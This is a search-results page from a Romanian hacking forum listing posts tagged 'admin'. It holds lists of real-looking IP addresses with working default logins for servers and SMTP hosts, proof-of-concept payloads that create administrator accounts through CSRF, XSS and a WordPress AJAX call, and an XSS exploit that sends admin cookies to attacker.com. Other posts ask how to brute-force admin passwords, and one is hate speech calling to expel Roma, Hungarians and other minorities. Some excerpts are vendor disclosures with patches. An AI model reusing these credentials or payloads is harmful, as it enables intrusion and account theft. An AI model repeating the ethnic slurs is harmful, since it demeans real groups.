Jump to content

Search the Community

Showing results for tags 'admin'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 18 results

  1. Admin Page Finder 5.0 Download: DepositFiles
  2. Cred ca toti oamenii de aici folosesc Steam, eu am incercat sa ma conectez pe steam si dupa ce puneam usernameul si parola de obicei iti spune ca trebuie sa introduci un cod care a fost trimis pe email, ei bine, mie imi arata ca trebuie sa instalez un program de la steam pe nume SteamService, care aparent este un Keylogger sau ceva de genul, dupa ce il rulam, daca aveam steamul deschis mi-l inchidea instant. Si dupa nu mai mergea sa il deschid. Apoi, dupa 10 minute am observat ca era ceva ce nu era marca Steamcommunity, era un produs PuTTY suite. L-am scanat cu 2 antivirusuri, 1. Malware Bytes si 2. Norton Security si nimic, spunea ca PC-ul meu este intact. M-am uitat apoi pe steam undea am jocul CS:GO si imi lipseau niste iteme in valoare de peste 10 euro pentru ca un anumit Al Capone de pe steam mi le-a furat. Interesat as fi sa aflu, cum le pot recupera si cum imi pot scoate acest PuTTY suite din calculator. Acesta este steamul celui care mi-a facut aceste lucruri: Steam Community :: Al Capone Multumesc anticipat.
  3. Salut...Am cautat de mult timp ceva sa aflu parola unui admin dupa cs 1.6 si nimic...sunt multe porcari pe net....dar nu merg toate...defapt niciunul din care l-am probat eu Stie careva cum sa am acc full la orice dupa un svr de cs 1.6 sau sa aful parola unui admin...ceva..pls un tutorial sau o metoda va rog...Fara criticii multam!
  4. Utilizatorul @CarryOn care "cumpara" bitcoin: https://rstforums.com/forum/102725-cumpar-bitcoin-ofer-paypal.rst#post639371 este un tepar, i-am trimis 30$ bitcoin si a disparut.. ca Elodia. Nu mai raspunde la mesaje, etc.. Eventual un admin sa ii dea ban ca sa nu mai prosteasca lumea in continuare.
  5. Este un Admin page finder facut in python. Sursa nu este in totalitate a mea asa ca nu vreau comentarii rautacioase. M-am gandit sa il postez deoarece unora chiar le poate fi de ajutor. PS: Scuze pentru exemplul de site dar altceva nu mi-a venit in minte decat site-ul lui Viorel Download LINK : Download ADMIN PAGE FINDER By Cyb3rGhost
  6. Salut, lucrez de cateva saptamani la un marketplace, in care oricine se poate inregistra si vinde produse digitale prin bitcoin. mai am cateva saptamani de lucru, la seo, si alte functii. totusi intre timp as fi curios daca am facut greseli mari la securitate, sunt un programator de nivel mediu 2,3 anni experienta, pentru asta apelez la voi, nu am foarte multi bani la dispozitie, totusi pun la bataie 100 usd bitcoin pentru acest concurs. site : Simple Flask app with local Captcha user : admin pass : admin Siteul foloseste database remote, uneori o sa va dea erroare, rezolvarea e sa dati un refresh. Nu luati in considerare designul siteului o sa fie facut la sfarsit. Orice sfat sau ideee este bine venit. Va multumesc, Cu respect Ionut edit : As fi recunoscator daca imi ziceti, am incercat aia si aia dar fara success siteul e ok. Maresc miza la 500 usd ..
  7. Document Title: =============== Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: ============= 2015-04-28 apparitionsec ID (AS-ID): ==================================== AS-WFTP0328 Common Vulnerability Scoring System: ==================================== Overall CVSS Score 8.9 Product: =============================== Wing FTP Server is a Web based administration FTP client that supports following protocols FTP, FTPS, HTTPS, SSH Advisory Information: ============================== Security researcher John Page discovered a CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system. Vulnerability Disclosure Timeline: ================================== March 28, 2015: Vendor Notification March 28, 2015: Vendor Response/Feedback April 19, 2015: Vendor Notification April 28, 2015: Vendor released new patched version 4.4.6 April 28, 2015: Public Disclosure - John Page Affected Product(s): ==================== Wing FTP Server Admin 4.4.5 Product: Wing FTP Server - Admin Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Request Method(s): [+] POST & GET Vulnerable Product: [+] Wing FTP Server Admin 4.4.5 Vulnerable Parameter(s): [+] domain & type Affected Area(s): [+] Server Admin Proof of Concept (POC): ======================= The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction (click). Payload will add arbitrary users to the system. POC: Example http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES] POC: Payload(s) Add arbitrary user to the system: http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E POC XSS: http://localhost:5466/admin_viewstatus.html?domain= POC XSS: http://localhost:5466/admin_event_list.html?type= Solution - Fix & Patch: ======================= Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server) Security Risk: ============== The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9 Credits & Authors: ================== John Page ( hyp3rlinx ) - ISR godz @Apparitionsec Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org Source: http://dl.packetstormsecurity.net/1504-exploits/AS-WFTP0328.txt
  8. 70.169.56.202 | ftpuser | asteriskftp | Roanoke | VA | 24001 | United States 173.225.179.172 | admin | default | Detroit | MI | 48205 | United States 67.208.243.12 | admin | admin | Ravenna | MI | 49451 | United States 209.37.31.164 | admin | admin | Cathedral City | CA | 92234 | United States 71.123.54.210 | admin | default | Marcus Hook | PA | 19061 | United States 166.200.164.245 | root | 12345 | Unknown | Unknown | Unknown | United States 50.76.249.81 | bob | bob | River Forest | IL | 60305 | United States 24.249.137.38 | admin | admin | Baton Rouge | LA | 70815 | United States 72.16.252.102 | PlcmSpIp | PlcmSpIp | Houston | TX | 77001 | United States 23.24.149.58 | admin | changeme | Denver | CO | 80201 | United States 69.39.235.4 | test | test | Arlington Heights | IL | 60005 | United States 76.107.103.39 | pi | raspberry | Ridgeland | MS | 39157 | United States 24.158.228.30 | PlcmSpIp | PlcmSpIp | Birmingham | AL | 35201 | United States 107.146.60.22 | admin | default | Daytona Beach | FL | 32117 | United States 72.192.146.165 | user | user | Lakeside | CA | 92040 | United States 192.111.78.217 | admin | default | Chattanooga | TN | 37416 | United States 12.10.69.231 | admin | default | Unknown | Unknown | Unknown | United States 67.217.4.124 | user | user | Unknown | Unknown | Unknown | United States 24.116.172.18 | support | support | Idaho Falls | ID | 83402 | United States 107.146.57.102 | admin | admin | Ormond Beach | FL | 32174 | United States 209.236.67.48 | PlcmSpIp | PlcmSpIp | Providence | UT | 84332 | United States 70.61.156.146 | admin | admin | Fredericktown | OH | 43019 | United States 72.165.57.50 | admin | password | Unknown | Unknown | Unknown | United States 166.200.164.135 | root | admin | Unknown | Unknown | Unknown | United States 184.152.98.125 | admin | admin | Fort Lee | NJ | 07024 | United States 207.166.132.105 | ftpuser | asteriskftp | Saugus | MA | 01906 | United States 206.71.86.36 | ubnt | ubnt | Englewood | CO | 80111 | United States 173.14.133.252 | admin | default | Shelburne Falls | MA | 01370 | United States 67.208.243.244 | admin | admin | Ravenna | MI | 49451 | United States 216.187.79.163 | admIndian | defAustralialt | Vancouver | BC | V6B | Canada 207.172.223.34 | admin | default | Woburn | MA | 01801 | United States 199.193.232.53 | admin | default | Monmouth | OR | 97361 | United States 99.91.208.106 | pi | raspberry | Rochester | MI | 48306 | United States 50.77.84.141 | admin | default | Broomall | PA | 19008 | United States 24.249.137.35 | admin | admin | Baton Rouge | LA | 70815 | United States 184.176.201.135 | guest | guest | Rogers | AR | 72756 | United States 50.124.80.22 | admin | password | Minden | NV | 89423 | United States 198.108.193.207 | admin | default | Ann Arbor | MI | 48104 | United States 72.249.136.231 | admin | admin | Saint Louis | MO | 63131 | United States 67.208.243.13 | admin | admin | Ravenna | MI | 49451 | United States 198.48.80.240 | default | default | Seattle | WA | 98105 | United States 23.25.87.114 | user | user | Pittsburgh | PA | 15201 | United States 23.239.16.190 | test | test | Absecon | NJ | 08205 | United States 166.200.166.105 | root | root | Unknown | Unknown | Unknown | United States 97.78.4.14 | ubnt | ubnt | Unknown | Unknown | Unknown | United States 24.111.233.141 | user | user | Wahpeton | ND | 58075 | United States 50.57.229.173 | nagios | nagios | San Antonio | TX | 78218 | United States 71.43.183.194 | admin | default | Orlando | FL | 32801 | United States 207.8.234.158 | PlcmSpIp | PlcmSpIp | Novi | MI | 48374 | United States 64.57.203.238 | admin | admin | Stanfield | AZ | 85172 | United States 74.81.66.114 | ubnt | ubnt | Atlanta | GA | 30310 | United States 98.158.122.30 | root | admin | New York | NY | 10001 | United States 207.177.69.116 | admin | default | Spencer | IA | 51301 | United States 162.72.184.104 | user | user | Unknown | Unknown | Unknown | United States 74.143.229.187 | PlcmSpIp | PlcmSpIp | Evansville | IN | 47701 | United States 64.183.93.156 | admin | default | Los Angeles | CA | 90001 | United States 173.200.182.181 | PlcmSpIp | PlcmSpIp | San Jose | CA | 95101 | United States 24.220.179.179 | user | user | Grand Forks | ND | 58201 | United States 166.155.97.236 | root | root | Unknown | Unknown | Unknown | United States 166.200.167.35 | root | 12345 | Unknown | Unknown | Unknown | United States 166.200.167.115 | root | root | Unknown | Unknown | Unknown | United States
  9. Long story short: wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=USERUL&user_pass=PAROLA&role=administrator Some credits: Vulnerabilities discovered by Evex
  10. AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client with Ajax interface. AfterLogic WebMail Lite is available for both PHP and ASP.NET platforms. The version of AfterLogic WebMail Lite that is written in PHP is free and open-source software subject to the terms of the Affero General Public License (AGPL) version 3. The version written in ASP.NET is proprietary software available as freeware. And is deployed over 5/20 mailsevers, quite popular. This exploit attempts to exploit the admin and get(s) us a new password to the admin panel which should be located at site.com/mail/adminpanel/index.php <h2>After Logic Mail - Change Admin Password Exploit</h2> <form action="http://localhost/webmail/adminpanel/index.php?submit" method="POST" id="security_form"> <input type="hidden" name="form_id" value="security"> <input type="text" class="wm_input" name="txtUserName" id="txtUserName" value="mailadm" size="30" /> <input type="password" class="wm_input" name="txtNewPassword" id="txtNewPassword" value="newpass" size="30" /> <input type="password" class="wm_input" name="txtConfirmNewPassword" id="txtConfirmNewPassword" value="newpass" size="30" /> <input type="submit" name="submit_btn" value="Save" id="automate"> </form> <script> //uncomment the second line for automation //document.getElementById('automate').click(); </script> Source: http://dl.packetstormsecurity.net/1503-exploits/afterlogic-bypass.txt
  11. =============================================================================== CSRF to add admin user Vulnerability In Manage Engine Device Expert =============================================================================== . contents:: Table Of Content Overview ======== * Title : CSRF to add admin user Vulnerability In Manage Engine Device Expert * Author: Kaustubh G. Padwad * Plugin Homepage: http://www.manageengine.com/products/device-expert/ * Severity: HIGH * Version Affected: Version 5.9.9.0 Build: 5990 * Version Tested : Version 5.9.9.0 Build: 5990 * version patched: Separate Patch release for all version Description =========== About the Product ================= DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Vulnerable Parameter -------------------- Create user form About Vulnerability ------------------- This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an admin account into the application. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= * Add follwing code to webserver and send that malicious link to application Admin. * The admin should be loggedin when he clicks on the link. * Soical enginering might help here For Example :- Device password has been changed click here to reset ####################CSRF COde####################### <html> <body> <form action="https://Server-IP:6060/STATE_ID/1423516534014/CreateUser.ve" method="POST"> <input type="hidden" name="loginName" value="hackerkaustubh" /> <input type="hidden" name="password" value="kaustubh" /> <input type="hidden" name="confirmpass" value="kaustubh" /> <input type="hidden" name="emailaddress" value="kingkaustubh@me.com" /> <input type="hidden" name="SEND_EMAIL" value="true" /> <input type="hidden" name="roles" value="Administrator" /> <input type="hidden" name="ComponentSelection" value="SpecificDevice" /> <input type="hidden" name="searchfield" value="--Search Devices--" /> <input type="hidden" name="DEVICEGROUPSELECTION" value="1" /> <input type="hidden" name="DeviceGroupDescription"/> value="This device group contains all the devices present in the inventory" /> <input type="hidden" name="QUERYID" value="-1" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Receved from manage engine team https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip Open DeviceExper.zip 1. Stop the Device Expert service. 2. Please replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar 3. Start the Device Expert service Change Log ========== Disclosure ========== 11-February-2015 Reported to Developer 13-February-2015 Acknodlagement from Developer 13-March-2015 Fixed by developer 16-March-2015 Requested a cve ID 21-March-2015 Public Disclosed credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  12. # Exploit Title: Et-Chat 3.0.6 Cross Site Scripting Vulnerability # Google Dork: "ET-Chat v3.0.6" # Date: 2015-03-20 # Exploit Author: IranHack Security Team # Tested on: Windows 7 # Vendor : Www.Et-chat.Ir # Our Website : Www.IranHack.Org *************************************************** Vulnerable code : Location : /etchat/class/admin/AdminRoomsIndex.class.php Code : if (is_array($feld)){ $print_room_list = "<table>"; foreach($feld as $datasets){ if ($datasets[0]!=1) $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td><a href=\"./?AdminDeleteRoom&id=".$datasets[0]."&cs4rue=".$_SESSION['etchat_'.$this->_prefix.'CheckSum4RegUserEdit']."\">".$lang->delete[0]->tagData."</a></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; else $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td style=\"color: #888888;\"><strike>".$lang->delete[0]->tagData."</strike></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; } $print_room_list.= "</table>"; } *************************************************** Description : This vulnerability allows attacker to grab admin cookie and login with admin account The reason of this vulnerability is that values of the room list ( ".$datasets[1]." ) is not filtered and allows attacker to run javascript code. *************************************************** Exploit : 1- Upload this page in a host or Set this code in a html page : <html> <body> <form name="exploit" action="http://target.com/etchat/?AdminCreateNewRoom" method="POST"> <input type="hidden" name="room" value="<script>location.href="http://attacker.com/grabber.php?cookie="+escape(document.cookie)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> 2- Give the uploaded html page address to admin. 3- after opening this page by admin , cookies are logged in Log.txt *************************************************** grabber.php : http://up.iranhack.org/uploads/lquswjwo06vrxz1fe4oo.zip *************************************************** Patch : If u wanna patch this bug , go to file " /etchat/class/admin/AdminRoomsIndex.class.php " Replace this codes : ".$datasets[1]." With this code : ".htmlspecialchars($datasets[1])." *************************************************** Greetz : Mr.XpR , V30Sharp , AL1R3Z4 , Secret.Walker , Irblackhat , FarbodEZRaeL , black-sec , Mr.X2 , @3is , IR4N0nY , , 0x8F , Amirio , 3cure , FTA_Boy , Mr.FixXxer ./Moji.Rider Source
  13. Advisory ID: SGMA15-001 Title: DokuWiki persistent Cross Site Scripting Product: DokuWiki Version: 2014-09-29c and probably prior Vendor: www.dokuwiki.org Vulnerability type: Persistent XSS Risk level: Medium Credit: Filippo Cavallarin - segment.technology CVE: N/A Vendor notification: 2015-03-18 Vendor fix: 2015-03-19 Public disclosure: 2015-03-23 Details DokuWiki version 2014-09-29c (and probably prior) is vulnerable to Persistent Cross Site Scriptng in the admin page. An attacker may use this vulnerability to execute javascript in the context of a logged admin user. Since the vulnerable page has forms with the CSRF token (the same for all requests), a full backend compromise may be possible. To successfully exploit this vulenrability an attacked must: 1. have an account on the target site 2. trick and admin to visit a link or to edit user account Proof of concept: 1. change your account real name to: my name" autofocus onfocus="alert('code executed') 2. login as admin and try to edit the user profile from User Manager Solution Apply the latest hotfix from vendor's site References https://www.dokuwiki.org/ https://github.com/splitbrain/dokuwiki/issues/1081 Filippo Cavallarin https://segment.technology Source
  14. 1. Afara cu tiganii. 2. Afara cu bozgorii. 3. Afara cu alte minoritati. 4. Afara cu idiotii ce promoveaza mixingul rasial / prietenia cu minoritatile (prin asta se intelege Rasism Anti-Alb [greu de inteles pt unii]) De ce? Sa nu mai influenteze negativ tineretul de etnie geto-daca de pe forum. Cat timp acest forum este "Romanian" pai asa sa ramana. Cer parerea unui admin, respectiv @aelius Si nu, nu fac abuz in caz ca altii vor face gura. Spun purul adevar si fac apel la UN OM ce spune lucrurilor pe nume si are o oarecare raspundere pe forum.
  15. 200.115.163.102 admin admin|220 mail.ajover.com 200.12.171.68 admin admin|220 optenet SpamFilter 200.162.25.80 admin admin|220 CGD Securities. You are not invited to the party. 200.174.129.134 admin admin|220 Websense Email Security Gateway service is ready. 200.174.156.53 admin admin|220 bm1ex02.cal-comp.com.br Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sat, 7 Feb 2015 20:12:08 -0400 200.186.101.135 admin admin|220 Service is ready. 200.212.136.190 admin admin|220 Esmtp service is ready. 200.24.206.91 admin admin|220 Websense Email Security Gateway service is ready. 200.32.206.114 admin admin|220 local.domain ESMTP 200.34.34.250 admin admin|220 Mail service is ready. 200.34.34.195 admin admin|220 Mail service is ready. 200.39.21.210 admin admin|220 localizadortest.movistar.com.mx ESMTP Postfix 200.39.21.211 admin admin|220 localizadortest.movistar.com.mx ESMTP Postfix 200.41.237.251 admin admin|220 ocacashub Microsoft ESMTP MAIL Service ready at Sat, 7 Feb 2015 21:16:43 -0300 200.41.237.250 admin admin|220 barracuda.oca.com.ar ESMTP (9687e202e6b7787cb3e1de4e53d57047) 200.49.66.154 admin admin|220 Ready. 200.52.68.11 admin admin|220 actinver.com.mx 200.55.223.203 admin admin|220 SERVERSLEX.laselecta.cl Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sat, 7 Feb 2015 21:18:10 -0300 200.6.123.18 admin admin|220 Websense Email Security Gateway service is ready. 200.66.107.3 admin admin|220 mail.idesa.com.mx 200.67.164.222 admin admin|220 mail.kalan.mx 200.72.145.251 admin admin|220 optenet SpamFilter 200.7.194.254 admin admin|220 mail.pacifico.fin.ec service is ready. 200.75.51.152 admin admin|220 optenet SpamFilter 200.75.51.153 admin admin|220 optenet SpamFilter 200.75.51.155 admin admin|220 optenet SpamFilter 200.80.198.229 admin admin|220 local.domain ESMTP 200.9.100.51 admin admin|220 [200.9.100.51] ESMTP 201.166.134.83 admin admin|220 antispam2.sictel.com Ready 201.238.215.70 admin admin|220 paradigma.mproliquidadores.cl Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sat, 7 Feb 2015 21:22:16 -0300 201.245.26.250 admin admin|220 indusel.com.co ESMTP 201.234.214.254 admin admin|220 mail.pacifico.fin.ec service is ready. 200.0.148.108 account account|220 ***************** 75.85.119.134 admin admin|220 heartofsteel.homelinux.net ESMTP Postfix 200.63.21.35 accounting accounting|220 rushcargo.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sat, 7 Feb 2015 21:51:10 -0300 200.6.60.7 user user|220 trufimasrv01.trufima.local ESMTP Service ready 200.0.148.92 user01 user01|220 ***************** 200.0.148.192 user01 user01|220 ***************** 200.49.142.147 user1 user1|220 mail.ffavaloro.org Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Sat, 7 Feb 2015 22:53:24 -0300 201.224.33.233 username username|220 SMTP Server 200.35.179.201 webmaster webmaster|220 srvdell.CORTE.LOCAL ESMTP Service ready 200.80.239.50 webmaster webmaster|220 mail.merk2.net ESMTP Postfix 75.10.230.5 webmaster webmaster|220 mail.sfmta.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sat, 7 Feb 2015 18:45:17 -0800 200.58.175.40 backup backup|220 TIDTC-EXCH13-01.central.cotas.com Microsoft ESMTP MAIL Service ready at Sat, 7 Feb 2015 23:12:41 -0400 200.6.25.65 backup backup|220 ******************************************************************************************* 201.229.87.32 backup backup|220 svga_svr.Bibito.svga.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.7381 ready at Sat, 7 Feb 2015 23:13:15 -0400 75.32.81.121 backup backup|220 pri.californiawestcommunities.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sat, 7 Feb 2015 19:15:40 -0800 75.68.0.218 backupexec backupexec|220 astront.astropmi.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Sat, 7 Feb 2015 22:31:53 -0500 200.241.84.246 business business|220 mta1.elo.com.br ESMTP Postfix 200.241.84.82 business business|220 mta3.elo.com.br ESMTP Postfix 200.146.194.250 clamav clamav|220 avanti-fios.com.br ESMTP Postfix 200.192.64.33 clamav clamav|220 ********************************* 75.3.216.89 customer customer|220 adsl-75-3-216-89.dsl.frs2ca.sbcglobal.net Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 02:24:14 -0800
  16. twopac

    SMTP's

    Verificati-le ... 117.144.165.114 admin admin|220 ESMTP on WinWebMail [3.9.0.7] ready. http://www.winwebmail.com 117.144.214.250 admin admin|220 eBaoTech esg service is ready. 117.135.132.13 admin admin|220 ESMTP on WinWebMail [3.8.6.1] ready. http://www.winwebmail.com 117.239.39.69 admin admin|220 dns.mpexcise.org ESMTP 117.25.155.81 admin admin|220 ESMTP on WinWebMail [3.8.5.1] ready. http://www.winwebmail.com 117.239.56.168 admin admin|220 Email Security Gateway service is ready 117.27.234.29 admin admin|220 ESMTP on WinWebMail [3.9.0.7] ready. http://www.winwebmail.com 117.29.188.54 admin admin|220 WAIN-SERVERE.wain.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Fri, 6 Feb 2015 22:40:50 +0800 117.29.188.62 admin admin|220 xianhai.com ESMTP MDaemon 10.1.1; Fri, 06 Feb 2015 22:35:06 +0800 117.41.168.69 admin admin|220 ESMTP on WinWebMail [3.8.3.1] ready. http://www.winwebmail.com 117.52.82.39 admin admin|220 wiltronkr1.wiltron.co.kr ESMTP 117.52.82.21 admin admin|220 wiltronkr1.wiltron.co.kr ESMTP 117.74.132.123 admin admin|220 365ker antispam server1.1 123.1.179.87 admin admin|220 ESMTP on WinWebMail [3.9.0.1] ready. http://www.winwebmail.com 123.147.199.149 admin admin|220 Websense Email Security Gateway service is ready. 123.157.208.196 admin admin|220 ESMTP on WinWebMail [3.8.2.1] ready. http://www.winwebmail.com 123.235.2.154 admin admin|220 ESMTP on WinWebMail [3.8.1.3] ready. http://www.winwebmail.com 123.50.80.170 admin admin|220 rmnbdn.synology.me ESMTP Postfix 123.73.23.182 admin admin|220 Welcome to the INDY SMTP Server 123.89.189.212 admin admin|220 ESMTP on WinWebMail [3.9.0.7] ready. http://www.winwebmail.com 117.102.86.35 accounting accounting|220 server.mrsafetygroup.com ESMTP MDaemon 13.5.1; Fri, 06 Feb 2015 22:43:03 +0700 117.247.85.169 accounts accounts|220 vidyawire.com VPOP3 ESMTP Server Ready 123.30.75.150 webadmin webadmin|220 HC2.cantho.egov.vn Microsoft ESMTP MAIL Service ready at Sat, 7 Feb 2015 02:30:23 +0700 123.100.100.32 contactus contactus|220 harley.maxnet.net.nz ESMTP Postfix (Ubuntu) 123.100.67.153 contactus contactus|220 quinn.maxnet.net.nz ESMTP Postfix (Ubuntu) 123.100.67.152 contactus contactus|220 harley.maxnet.net.nz ESMTP Postfix (Ubuntu) 123.100.67.225 contactus contactus|220 quinn.maxnet.net.nz ESMTP Postfix (Ubuntu) 123.124.208.100 customer customer|220 FOTON ESMTP Service Ready 123.192.240.10 demo demo|220 smtp.kbronet.com.tw ESMTP Postfix
  17. Salut rst, cum as putea face brute force la un site de ucoz pentru a afla parola de admin? indicatii? poate niste tutoriale? caci nu gasesc pe aici ...
  18. PerUse1 ($10.00) -> 20 socks le folosesti cand vrei ( in max 1 luna ) PerUse2 ($10.00) -> 50 socks le folosesti cand vrei ( in max 1 luna ) PerUse3 ($10.00) -> 80 socks le folosesti cand vrei ( in max 1 luna ) PerUse4 ($10.00) -> 2000 socks le folosesti cand vrei ( in max 1 luna ) Daily 5 ($20.00) -> zilnic 5 ( ptr 1 luna ) Daily 10 ($35.00) -> zilnic 10 ( ptr 1 luna ) Daily 20 ($50.00) -> zilnic 20 ( ptr 1 luna ) PerUse350 ($49.00) -> ( ptr 1 luna ) -------------------------------------- Astea sunt preturile de pe site reale, nu imi bag nimic la ele, contul de re-seller este al unui prieten care intra mai rar... daca vi se schimba parola v-o pot inapoia , ma gasiti pe icq. E doar un serviciu gratis , nu imi iau nimic ptr trb asta , nu sunt curios de cativa dolarei PS : ** 17% liberty reserve exchange fee will be added to your payment 17% Se va adauga ptr plata in lr , preturile cu plata wmz cele de sus sau Roboxchange. LR,WMZ Si RoboxChange.. astea fiind modalitatile de plata , plata o faceti pe site dupa ce v-am creat contul si nu mie, sunteti obligati sa platiti dupa ce creez contul, altfel il sterg, nu vreau sa fac conturi aiurea! serviciul de conturi ptr admin.soxx.biz a mai fost postat intr-un thread dar acum 1 an si 3 luni dar cu alte preturi , nush daca mai e available...! let me know !
×
×
  • Create New...